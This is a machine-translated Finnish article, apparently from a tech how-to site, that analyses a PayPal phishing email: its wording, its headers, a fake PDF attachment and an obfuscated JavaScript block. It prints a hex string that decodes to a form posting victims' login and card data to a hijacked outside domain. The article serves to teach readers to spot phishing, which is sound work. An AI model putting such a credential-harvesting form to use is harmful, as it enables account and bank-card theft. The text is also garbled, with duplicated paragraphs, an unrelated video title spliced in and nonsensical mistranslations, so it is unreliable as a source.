Online-tietoturva: Phishing-sähköpostin anatomian hajoaminen

Sisällysluettelo:

Online-tietoturva: Phishing-sähköpostin anatomian hajoaminen
Online-tietoturva: Phishing-sähköpostin anatomian hajoaminen

Video: Online-tietoturva: Phishing-sähköpostin anatomian hajoaminen

Video: Online-tietoturva: Phishing-sähköpostin anatomian hajoaminen
Video: Turn Virtual Machine into Synology NAS | DSM 7 + Physcial Disks - YouTube 2024, Marraskuu
Anonim
 Nykymaailmassa, jossa kaikki tiedot ovat verkossa, tietojenkalastelu on yksi suosituimmista ja tuhoisimmista verkkohyökkäyksistä, koska voit aina puhdistaa viruksen, mutta jos pankkisi yksityiskohtia varastetaan, sinulla on ongelmia. Tässä on yksi tällainen hyökkäys, jonka saimme.
Nykymaailmassa, jossa kaikki tiedot ovat verkossa, tietojenkalastelu on yksi suosituimmista ja tuhoisimmista verkkohyökkäyksistä, koska voit aina puhdistaa viruksen, mutta jos pankkisi yksityiskohtia varastetaan, sinulla on ongelmia. Tässä on yksi tällainen hyökkäys, jonka saimme.

Älä usko, että vain pankkisi tiedot ovat tärkeitä: loppujen lopuksi, jos joku voi hallita tiliisi kirjautumista, he eivät vain tiedä kyseisen tilin tietoja, mutta kertoimet ovat, että samaa kirjautumistietoa voidaan käyttää useissa muissa tilejä. Ja jos he vaarantavat sähköpostitilin, he voivat nollata kaikki muut salasanasi.

Sen lisäksi, että säilytetään vahvoja ja vaihtelevia salasanoja, sinun on aina oltava etsimässä väärennetyt sähköpostit, jotka masquerading todellisena. Vaikka useimmat tietojenkalasteluyritykset ovat amatöörimäisiä, jotkut ovat varsin vakuuttavia, joten on tärkeää ymmärtää, miten tunnistaa ne pinta-alalla ja miten ne toimivat hupparin alla.

Kuva asirap

Tutkitaan mitä tavallisella näkökulmalla

Esimerkkisähköpostimme, kuten useimmat tietojenkalasteluyritykset, "ilmoittavat" sinulle PayPal-tilisi toiminnasta, joka normaaleissa olosuhteissa olisi hälyttävä. Joten toimintapyyntö on tarkistaa / palauttaa tilisi lähettämällä lähes kaikki henkilökohtaiset tiedot, joista voit ajatella. Jälleen tämä on melko kaavaa.

Vaikka varmasti on poikkeuksia, melkein kaikki tietojenkalastelu- ja huijaussähköpostit ovat täynnä punaisia lippuja suoraan viestissä. Vaikka teksti onkin vakuuttava, voit yleensä löytää monia virheitä, jotka ovat täynnä viestirunkoa, mikä osoittaa, että viesti ei ole legitiä.

Viesti-elin

Ensi silmäyksellä tämä on yksi parhaista tietojenkalasteluvakoista, joita olen nähnyt. Ei ole oikeinkirjoitus- tai kieliopillisia virheitä ja sananluku lukee sen mukaan, mitä voit odottaa. Kuitenkin muutamia punaisia lippuja näet, kun tarkastelet sisältöä hieman tarkemmin.
Ensi silmäyksellä tämä on yksi parhaista tietojenkalasteluvakoista, joita olen nähnyt. Ei ole oikeinkirjoitus- tai kieliopillisia virheitä ja sananluku lukee sen mukaan, mitä voit odottaa. Kuitenkin muutamia punaisia lippuja näet, kun tarkastelet sisältöä hieman tarkemmin.
  • "Paypal" - Oikea tapaus on "PayPal" (pääoma P). Näet, että molempia muunnelmia käytetään viestissä. Yritykset ovat hyvin tietoisia brändiään, joten on epävarmaa, että jotain tällaista antaisi läpäisemisen.
  • "Sallikaa ActiveX" - Kuinka monta kertaa olet nähnyt PayPalin kokoisen legit-verkkopohjaisen liiketoiminnan, joka käyttää vain yhtä selainta, varsinkin kun he tukevat useita selaimia? Toki, jonnekin siellä yritys tekee sen, mutta tämä on punainen lippu.
  • "Turvallisesti". - Huomaa, kuinka tämä sana ei ole reunustamassa muiden kappaleen tekstin kanssa. Vaikka venytin ikkunan hieman, se ei kääri tai tilaa oikein.
  • "Paypal!" - Huudahdinta edeltävä tila näyttää hankalalta. Ainoa huijaus, josta olen varma, ei tule olemaan legit-sähköpostissa.
  • "PayPal-tilin päivitysmuoto.pdf.htm" - Miksi Paypal liittää "PDF" erityisesti silloin, kun ne voisivat vain linkittää sivun sivustoonsa? Lisäksi, miksi he yrittävät peittää HTML-tiedoston PDF: ksi? Tämä on kaikkien näiden kaikkien maiden suurin puna-lippu.

Viestin otsikko

Kun tarkastelet viestin otsikkoa, näkyviin tulee vielä pari punaista lippua:
Kun tarkastelet viestin otsikkoa, näkyviin tulee vielä pari punaista lippua:
  • Osoitteesta osoitteesta [email protected].
  • Osoitteeseen puuttuu. En tyhjennyt tätä, se ei yksinkertaisesti ole osa standardiviestiotsikkoa. Tyypillisesti yritys, jolla on nimesi, mukauttaa sähköpostin sinulle.

Liite

Kun avaat liitetiedoston, näet heti, että ulkoasu ei ole oikea, koska tyylitiedot puuttuvat. Jälleen, miksi PayPal lähetti HTML-lomakkeen, kun he voisivat yksinkertaisesti antaa sinulle linkin omalla sivustollaan?

Huomautus: käytimme Gmailin sisäänrakennettua HTML-liitteiden katselulaitetta, mutta suosittelemme, että et avaa liitetiedostoja huijareilta. Ei koskaan. Koskaan. He usein sisältävät hyökkäyksiä, jotka asentavat troijalaisia tietokoneellesi varastaaksesi tilitietosi.

Selaa hieman enemmän, näet, että tämä lomake pyytää paitsi PayPal-kirjautumistietojasi, myös pankki- ja luottokorttitietojasi varten. Jotkut kuvat ovat rikki.
Selaa hieman enemmän, näet, että tämä lomake pyytää paitsi PayPal-kirjautumistietojasi, myös pankki- ja luottokorttitietojasi varten. Jotkut kuvat ovat rikki.
On selvää, että tämä tietojenkalasteluyritys kulkee kaiken kanssa yhdellä syöksyllä.
On selvää, että tämä tietojenkalasteluyritys kulkee kaiken kanssa yhdellä syöksyllä.

Tekninen erittely

Vaikka sen pitäisi olla melko selvää sen perusteella, mikä on selväksi, että tämä on tietojenkalastelupyrkimys, aion nyt murtaa sähköpostin tekninen koostumus ja nähdä, mitä löydämme.

Liitteen tiedot

Ensimmäinen asia tarkastella on liitetiedoston HTML-lähde, joka toimittaa tiedot vääräksi sivustolle.

Kun lähdettä tarkastellaan nopeasti, kaikki linkit näyttävät päteviä, koska ne osoittavat joko "paypal.com" tai "paypalobjects.com", jotka ovat molemmat legit.

Nyt tarkastelemme joitain perustietojen tietoja, jotka Firefox kerää sivulle.
Nyt tarkastelemme joitain perustietojen tietoja, jotka Firefox kerää sivulle.
Kuten näette, jotkut grafiikat vedetään verkkotunnuksista "blessedtobe.com", "goodhealthpharmacy.com" ja "pic-upload.de" legit PayPalin verkkotunnusten sijaan.
Kuten näette, jotkut grafiikat vedetään verkkotunnuksista "blessedtobe.com", "goodhealthpharmacy.com" ja "pic-upload.de" legit PayPalin verkkotunnusten sijaan.
Image
Image

Tiedot sähköpostin otsikoista

Seuraavaksi tarkastelemme raakaa sähköpostiviestien otsikoita. Gmail tekee tämän saatavalla viestin Näytä alkuperäisen valikkovaihtoehdon kautta.

Kun tarkastellaan alkuperäisen viestin otsikkotietoja, näet, että tämä viesti koostui Outlook Express 6: sta. Epäilen, että PayPalilla on henkilöitä, jotka lähettävät kukin näistä viesteistä manuaalisesti vanhan sähköpostiohjelman kautta.
Kun tarkastellaan alkuperäisen viestin otsikkotietoja, näet, että tämä viesti koostui Outlook Express 6: sta. Epäilen, että PayPalilla on henkilöitä, jotka lähettävät kukin näistä viesteistä manuaalisesti vanhan sähköpostiohjelman kautta.
Nyt tarkastelemme reititysinformaatiota, voimme nähdä sekä lähettäjän että uudelleenlähetyspalvelimen IP-osoitteen.
Nyt tarkastelemme reititysinformaatiota, voimme nähdä sekä lähettäjän että uudelleenlähetyspalvelimen IP-osoitteen.
Käyttäjän IP-osoite on alkuperäinen lähettäjä. IP-tietojen nopea etsintä, voimme nähdä lähettävän IP-osoitteen Saksassa.
Käyttäjän IP-osoite on alkuperäinen lähettäjä. IP-tietojen nopea etsintä, voimme nähdä lähettävän IP-osoitteen Saksassa.
Ja kun katsomme lähettävän sähköpostipalvelimen (mail.itak.at) IP-osoitetta, voimme nähdä, että tämä on Itävallassa sijaitseva Internet-palveluntarjoaja. Epäilen, että PayPal reitittää sähköpostit suoraan Itävallan Internet-palveluntarjoajan kautta, kun heillä on massiivinen palvelinrakennus, joka pystyy helposti käsittelemään tätä tehtävää.
Ja kun katsomme lähettävän sähköpostipalvelimen (mail.itak.at) IP-osoitetta, voimme nähdä, että tämä on Itävallassa sijaitseva Internet-palveluntarjoaja. Epäilen, että PayPal reitittää sähköpostit suoraan Itävallan Internet-palveluntarjoajan kautta, kun heillä on massiivinen palvelinrakennus, joka pystyy helposti käsittelemään tätä tehtävää.
Image
Image

Missä tiedot siirtyvät?

Joten olemme selvästi määrittäneet, että kyseessä on tietojenkalastelusähköposti ja kerätty tietoja siitä, mistä viesti on peräisin, mutta entä missä tietoja lähetetään?

Nähdäksesi tämän, meidän on ensin tallennettava HTM-liite työpöydälle ja avattava tekstieditorissa. Selaa läpi, kaikki näyttää olevan kunnossa paitsi, kun saamme epäilyttävän näköisen JavaScript-lohkon.

Kun lopetat Javascriptin viimeisen blokin täydellisen lähteen, näemme:
Kun lopetat Javascriptin viimeisen blokin täydellisen lähteen, näemme:

Aina kun näet suuren sekasorvan merkkijonoon näennäisesti satunnaisia kirjaimia ja numeroita, jotka on upotettu Javascript-lohkoon, se on yleensä epäilyttävää. Tarkasteltaessa koodia muuttuja "x" asetetaan tähän suureen merkkijonoon ja dekoodataan sitten muuttujalle "y". Muuttujan "y" lopullinen tulos kirjoitetaan sitten asiakirjaan HTML: ksi.

Koska suuri merkkijono on numerot 0-9 ja kirjaimet a-f, se todennäköisesti koodataan yksinkertaisen ASCII-Hex-muuntamisen kautta:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Kääntää:

Ei ole sattumaa, että tämä dekoodataan kelvolliseksi HTML-lomakekoodiksi, joka lähettää tulokset ei PayPaliin vaan roistovalikkoon.

Lisäksi, kun tarkastelet lomakkeen HTML-lähdettä, näet, että tämä lomakekoodi ei ole näkyvissä, koska se luodaan dynaamisesti Javascriptin kautta. Tämä on älykäs tapa piilottaa, mitä HTML todella tekee, jos joku näkisi vain luotu liitetiedoston lähdekoodin (kuten aikaisemminkin), toisin kuin liitetiedoston avaaminen suoraan tekstieditorissa.

Suoran pikakäynnistyksen tekeminen rikkomuksellisella sivustolla näemme tämän verkkotunnuksen, joka isännöi suosittu web-isäntä, 1and1.
Suoran pikakäynnistyksen tekeminen rikkomuksellisella sivustolla näemme tämän verkkotunnuksen, joka isännöi suosittu web-isäntä, 1and1.
Mikä erottuu, verkkotunnus käyttää luettavaa nimeä (toisin kuin "dfh3sjhskjhw.net") ja verkkotunnusta on rekisteröity 4 vuotta. Tämän vuoksi uskon, että tätä verkkotunnusta kaapattiin ja sitä käytettiin salasanana tässä phishing-yrityksessä.
Mikä erottuu, verkkotunnus käyttää luettavaa nimeä (toisin kuin "dfh3sjhskjhw.net") ja verkkotunnusta on rekisteröity 4 vuotta. Tämän vuoksi uskon, että tätä verkkotunnusta kaapattiin ja sitä käytettiin salasanana tässä phishing-yrityksessä.

Kyynisyys on hyvä puolustus

Kun on kyse turvallisesta verkosta pysymisestä, se ei koskaan sattuu olemaan kyynisyyttä.

Vaikka olen varma, että esimerkkiviestissä on enemmän punaisia lippuja, olemme maininneet edellä osoitetut indikaattorit vain muutaman minuutin tutkimisen jälkeen. Hypoteettisesti, jos sähköpostin pinnan taso jäljitteli oikean vastapuolensa 100%, tekninen analyysi paljastaisi edelleen sen todellisen luonteen. Siksi tuonti on mahdollista tutkia sekä mitä voit että ei voi nähdä.

Suositeltava: